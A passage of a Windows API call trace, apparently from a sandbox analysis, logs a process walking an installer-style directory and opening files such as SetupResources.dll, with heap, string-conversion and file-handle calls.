dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0060.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0060.678] AreFileApisANSI () returned 1 [0060.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0060.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71960 [0060.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1f0, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned 45 [0060.678] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1033\\localizeddata.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x47ad1a00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x47ad1a00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x47ad1a00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12db0)) returned 1 [0060.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0060.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0060.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0060.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0060.678] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.679] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.679] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0060.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0060.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0060.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0060.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0060.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0060.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0060.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0060.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0060.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0060.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0060.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0060.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0060.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfb0 [0060.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0060.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0060.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0060.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0060.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0060.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0060.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0060.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0060.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0060.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0060.679] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.679] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.679] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.679] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0060.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.679] AreFileApisANSI () returned 1 [0060.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1033\\SetupResources.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1033\\SetupResources.dll", lpUsedDefaultChar=0x0) returned 46 [0060.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0060.679] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.679] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d040 [0060.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0060.680] AreFileApisANSI () returned 1 [0060.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de00, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0060.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71a30 [0060.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de00, cbMultiByte=-1, lpWideCharStr=0x71a30, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1033\\SetupResources.dll") returned 46 [0060.680] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1033\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0060.680] GetFileType (hFile=0x420) returned 0x1 [0060.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0060.680] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0060.680] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0060.680] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0060.681] CloseHandle (hObject=0x420) returned 1 [0060.681] AreFileApisANSI () returned 1 [0060.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de00, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0060.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71960 [0060.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de00, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1033\\SetupResources.dll") returned 46 [0060.681] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1033\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0060.681] GetFileType (hFile=0x420) returned 0x1 [0060.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0060.681] CloseHandle (hObject=0x420) returned 1 [0060.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0060.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0060.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0060.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0060.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0060.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0060.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0060.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0060.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0060.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0060.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0060.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0060.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0060.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0060.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0060.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0060.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0060.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0060.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0060.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0060.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0060.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0060.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0060.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0060.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0060.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0060.682] AreFileApisANSI () returned 1 [0060.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de00, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0060.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71b00 [0060.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de00, cbMultiByte=-1, lpWideCharStr=0x71b00, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1033\\SetupResources.dll") returned 46 [0060.682] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1033\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1033\\setupresources.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358)) returned 1 [0060.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0060.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0060.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0060.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0060.682] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.682] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.682] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x5a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x462f0, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x5a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ce", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓䍘")) returned 0 [0060.682] FindClose (in: hFindFile=0x78f10 | out: hFindFile=0x78f10) returned 1 [0060.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfb0 [0060.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0060.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0060.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0060.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0060.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0060.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0060.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0060.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0060.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46898 | out: hHeap=0x20000) returned 1 [0060.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0060.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0060.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0060.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0060.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0060.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0060.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0060.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0060.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0060.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69170 [0060.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0060.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x535b0 [0060.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0060.683] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.683] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.683] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.683] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x535b0 | out: hHeap=0x20000) returned 1 [0060.683] AreFileApisANSI () returned 1 [0060.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1035", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1035", lpUsedDefaultChar=0x0) returned 27 [0060.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0060.683] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.683] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0060.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0060.684] AreFileApisANSI () returned 1 [0060.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0060.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78f10 [0060.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x78f10, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1035") returned 27 [0060.684] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1035" (normalized: "c:\\588bce7c90097ed212\\1035"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0060.684] GetLastError () returned 0x5 [0060.684] GetLastError () returned 0x5 [0060.684] SetLastError (dwErrCode=0x5) [0060.684] GetLastError () returned 0x5 [0060.684] SetLastError (dwErrCode=0x5) [0060.684] GetLastError () returned 0x5 [0060.684] SetLastError (dwErrCode=0x5) [0060.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78f10 | out: hHeap=0x20000) returned 1 [0060.684] AreFileApisANSI () returned 1 [0060.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0060.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78f10 [0060.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x78f10, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1035") returned 27 [0060.684] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1035" (normalized: "c:\\588bce7c90097ed212\\1035"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0060.684] GetLastError () returned 0x5 [0060.684] GetLastError () returned 0x5 [0060.684] SetLastError (dwErrCode=0x5) [0060.684] GetLastError () returned 0x5 [0060.684] SetLastError (dwErrCode=0x5) [0060.685] GetLastError () returned 0x5 [0060.685] SetLastError (dwErrCode=0x5) [0060.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78f10 | out: hHeap=0x20000) returned 1 [0060.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0060.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0060.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0060.685] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.685] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.685] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.685] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0060.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0060.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0060.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0060.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0060.685] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="1036", cAlternateFileName="")) returned 1 [0060.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0060.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0060.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0060.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0060.685] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\1035\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78f10 [0060.685] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.685] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe76, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0060.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0060.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0060.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, 